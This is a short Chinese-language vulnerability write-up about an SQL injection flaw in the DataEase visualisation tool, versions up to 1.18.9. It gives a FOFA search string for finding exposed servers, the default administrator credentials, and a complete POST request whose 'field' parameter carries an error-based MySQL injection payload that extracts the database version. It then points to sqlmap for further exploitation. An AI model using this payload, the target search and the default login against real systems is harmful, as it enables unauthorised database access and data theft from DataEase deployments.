1、DataEase数据可视化分析工具简介

DataEase 是开源的数据可视化分析工具，帮助用户快速分析数据并洞察业务趋势，从而实现业务的改进与优化。DataEase 支持丰富的数据源连接，能够通过拖拉拽方式快速制作图表，并可以方便与他人分享。
前端：Vue.js、Element
图库：Apache ECharts、AntV
后端：Spring Boot
中间件：MySQL
数据处理：Kettle、Apache Doris
基础设施：Docker

图片

2、漏洞描述

DataEase存在SQL注入漏洞，不受SQL注入黑名单影响

3、受影响版本

DataEase ≤ v.1.18.9

4、FOFA语句

"DataEase"

5、漏洞复现

SQL 语句使用 ${} 符号位于以下文件位置。
https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/ext/query/GridSql.xml
图片

POC

POST /api/log/logGrid/1/10 HTTP/1.1
{"orders":["time desc"],"conditions":[{"field":"123 AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT version()),0x716a6a6a71),1215)) RLIKE (SELECT (CASE WHEN (8626=8626) THEN 0x31323320414e4420475449445f53554253455428434f4e434154283078373136613661366237312c2853454c4543542076657273696f6e2829292c307837313661366136613731292c3132313529 ELSE 0x28 END)) AND (7803=7803"}]}

需要登录，admin/dataease

点击操作日志，抓包

使用SQLMAP